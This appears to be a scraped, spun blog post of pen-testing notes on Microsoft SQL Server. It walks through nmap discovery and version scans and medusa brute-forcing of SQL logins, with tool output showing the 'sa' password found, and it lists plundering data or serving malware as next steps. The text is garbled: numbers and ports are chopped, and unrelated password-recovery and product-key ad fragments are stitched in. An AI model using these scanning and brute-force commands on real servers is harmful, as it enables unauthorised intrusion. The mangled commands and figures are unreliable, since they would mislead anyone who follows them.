Blog Archive » Pen test and hack microsoft sql server (mssql)All the information I’m about to go over is nothing new, I’m just trying to organize all my notes on pen testing mssql. Hopefully my notes will help others. All the commands and instructions are Linux based so keep that in mind. The first thing you’ll need to do is discover IP addresses that have mssql running. So you’ll accomplish this by running some type of scan. The scanner of choice is always nmap but there are some things you’ll need to consider when scanning for mssql. The default port for mssql is 1. So for starters it’s definitely a good idea to scan an IP range looking for port 1. Step 1 scan for port 1. This will only scan for port 1. IP range will vary. My output is below. Starting Nmap 5. 5. @Kunal. SQL Server provides two types of Authentication, Windows Authentication and SQl Server Authentication. You can have Windows Authentication and. BETA1 ( http: //nmap. EST. Nmap scan report for 1. Host is up (0. 0. PORT STATE SERVICE. Nmap scan report for 1. Host is up (0. 0. PORT STATE SERVICE1. MAC Address: 0. 0: 0. C: 2. 9: 4. C: 3. E (VMware)Nmap done: 1. IP addresses (2 hosts up) scanned in 0. Figure 1: Options for discovering live systems with SQLPing3 (click to enlarge) In addition, SQLPing3 can scan for SQL Server instances that conventional port. So you’ll notice in the output nmap is reporting the version of mssql to be SQL Server 2005 which is correct in this case. Knowing the version is very important. Login into SQL Server using Windows Authentication. In Object Explorer, open Security folder, open Logins folder. Right Click on SA account and go to. How to Hack Databases: Cracking SQL Server Passwords & Owning the Server. Welcome back, my rookie hackers! A short while back, I began a new series on database. Related Posts. How to Find SQL Server 2012 Product Key from Windows Registry; How to Reset Forgotten SA Password without Stopping SQL Server Instance. In this case the 1. So great success we’ve found a box running mssql. Hold your horses because this is simply the beginning. If you’re scanning is focused then this type of scan is fine, meaning I’m not scanning thousands of hosts I’m only focused on a handful of hosts. If I’m only concerned about scanning a handful of hosts then my next step would be to determine two things. Version of the database. Are there any other additional listening ports for this database. To determine the version of the database we can once again turn to nmap. A 1. 92. 1. 68. 1. The “- A” option will try and determine as much information as it can about the service on port 1. The “- A” option will also try and determine the underlying OS running as well. Below is the output from this scan. Starting Nmap 5. 5. BETA1 ( http: //nmap. EST. Nmap scan report for 1. Host is up (0. 0. By: Jugal Shah | Read Comments (5) | Related Tips: More > Security Problem. What are the different ways to secure the SA login? Everyone is aware of the SA login and. SQL Password Recovery Free Tool, free and safe download. SQL Password Recovery Free Tool 1: Download SQL Password Recovery Free. MS SQL Server Password Unlocker is a professional and secure SQL password recovery software. It can easily reset SQL password including SA and other users passwords. PORT STATE SERVICE VERSION. Microsoft SQL Server 2. RTM. MAC Address: 0. C: 2. 9: 4. C: 3. E (VMware). Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port. Device type: general purpose. Running: Microsoft Windows 2. OS details: Microsoft Windows Server 2. SP1 or SP2. Network Distance: 1 hop. How can I recover lost product key from SQL Server 2012 installation? If you've misplaced your SQL Server product key, you can retrieve it from Windows registry using. Host script results: | ms- sql- info: | Windows server name: WIN2. MSSQLSERVER]| Instance name: MSSQLSERVER| Version: Microsoft SQL Server 2. RTM| Version number: 9. Product: Microsoft SQL Server 2. Service pack level: RTM| Post- SP patches applied: No| TCP port: 1. Named pipe: \\1. 92. Clustered: No. So you’ll notice in the output nmap is reporting the version of mssql to be SQL Server 2. Knowing the version is very important because different versions of SQL Server provide different security features and also have different vulnerabilities. There are other ways of determining the version of sql server without authenticating but to me nmap is the best solution. Next let’s talk about looking for other ports that mssql may be listening on. For multiple reasons, like load balancing, mssql can listen on multiple ports. When pen testing mssql we want to know what those ports are so we can bang against them. Depending on the configuration you can authenticate to every listening mssql port. One thing to keep in mind is that you can authenticate to mssql using your normal windows / network / active directory credentials or you can authenticate using an account that was setup on the mssql server. This is basically known as windows authentication or sql authentication. When setting up the sql server and ports the database administrator will have to configure on how this authentication takes place. The easier target is using sql credentials as those are typically configured with a weaker password policy. Now that I’ve discussed some of the issues let’s get cracking. So to determine additional ports that a database may be running on we’ll once again turn to nmap. This time I told mssql to also listen on port 1. So now go ahead and run the same nmap command as before. A - p 1. 43. 3 1. Starting Nmap 5. 5. BETA1 ( http: //nmap. ESTNmap scan report for 1. Host is up (0. 0. PORT STATE SERVICE VERSION1. Microsoft SQL Server 2. RTMMAC Address: 0. C: 2. 9: 4. C: 3. E (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port. Service Info: OS: Windows. Host script results: | ms- sql- info: | Windows server name: WIN2. MSSQLSERVER]| Instance name: MSSQLSERVER| Version: Microsoft SQL Server 2. RTM| Version number: 9. Product: Microsoft SQL Server 2. Service pack level: RTM| Post- SP patches applied: No| TCP port: 1. Named pipe: \\1. 92. Clustered: No| [1. Version: Microsoft SQL Server 2. RTM| Version number: 9. Product: Microsoft SQL Server 2. Service pack level: RTM| Post- SP patches applied: No|_ TCP port: 1. So we see that nmap reports back ports 1. You may be wondering how nmap knew that port 1. MSSQL runs a service called the “browser service” which runs on port 1. UDP instead of TCP. If this browser service wasn’t running nmap wouldn’t be able to pull this information. Basically nmap queries port 1. It does this using the mssql nmap script. There are a couple of other tools here and here that do the same thing but I stick with nmap since it’s already baked in. So the browser service and additional ports is a very important to keep in mind when pen testing mssql. Now we have more information about our target which hopefully means we’ll find a weak spot that we can exploit. Once you know the version it’s always recommended to search CVE (common vulnerabilities and weaknesses) and it may also not be a bad idea to search inside the metasploit tool as well. There aren’t a whole lot of remote code execution vulnerabilities for anything SQL Server 2. So if they aren’t running an old unpatched version of mssql then that means you’ll need credentials to authenticate to the sql server. This means we’ll need to try and brute force the credentials. The main tool I like to use to perform brute force attacks is medusa, another good alternative is hydra. I have had different degrees of luck with both tools so it may be useful to run both tools although my default is medusa. I will only cover how to use medusa, below is the typical command line options that you feed into medusa. U dictionary. txt - P dictionary. O medusa. Output. M mssql. The - h is the host, the - U is the username list, - P is the password list, - O is the output file, - M is the module you want to run against in this case it’s mssql. Below is the output of this command. Medusa v. 2. 0 [http: //www. C) Jo. Mo- Kun / Foofus Networks. ACCOUNT CHECK: [mssql] Host: 1. User: admin (1 of 3, 0 complete) Password: admin (1 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: admin (1 of 3, 0 complete) Password: password (2 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: admin (1 of 3, 0 complete) Password: sa (3 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: password (2 of 3, 1 complete) Password: admin (1 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: password (2 of 3, 1 complete) Password: password (2 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: password (2 of 3, 1 complete) Password: sa (3 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: sa (3 of 3, 2 complete) Password: admin (1 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: sa (3 of 3, 2 complete) Password: password (2 of 3 complete)ACCOUNT FOUND: [mssql] Host: 1. User: sa Password: password [SUCCESS]Your output file resemble the following. Output. txt# Medusa v. U dictionary. txt - P dictionary. O medusa. Output - M mssql. ACCOUNT FOUND: [mssql] Host: 1. User: sa Password: password [SUCCESS]# Medusa has finished (2. The file output is much easier to parse and we can see in the next to last line that it was successful in finding credentials of username = sa and password = password. By default medusa will run against the standard port which is 1. U dictionary. txt - P dictionary. O medusa. Output - M mssql - n 1. Medusa v. 2. 0 [http: //www. C) Jo. Mo- Kun / Foofus Networks. ACCOUNT CHECK: [mssql] Host: 1. User: admin (1 of 3, 0 complete) Password: admin (1 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: admin (1 of 3, 0 complete) Password: password (2 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: admin (1 of 3, 0 complete) Password: sa (3 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: password (2 of 3, 1 complete) Password: admin (1 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: password (2 of 3, 1 complete) Password: password (2 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: password (2 of 3, 1 complete) Password: sa (3 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: sa (3 of 3, 2 complete) Password: admin (1 of 3 complete)ACCOUNT CHECK: [mssql] Host: 1. User: sa (3 of 3, 2 complete) Password: password (2 of 3 complete)ACCOUNT FOUND: [mssql] Host: 1. User: sa Password: password [SUCCESS]So you see that medusa was able to authenticate to port 1. This may not always be the case. With mssql you can configure different ports with different credentials so it’s always best to run a brute force tool like medusa on each individual port and see if you get any hits. Medusa and hydra can take a while to run in my case I had a very small dictionary seen below. Large dictionaries can take some time to run so keep that in mind when you’re brute forcing using these kinds of tools. So we got lucky and we credentials for a mssql database, that’s awesome but it’s just another step in the process. Going forward we have a couple of options. As a true attacker you would consider the following options. Plunder the database for information. Use your credentials to gain further access (e. Start serving up malware for potential victims. I’m not going to touch on the third option but I will discuss the first and second option.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
August 2016
Categories |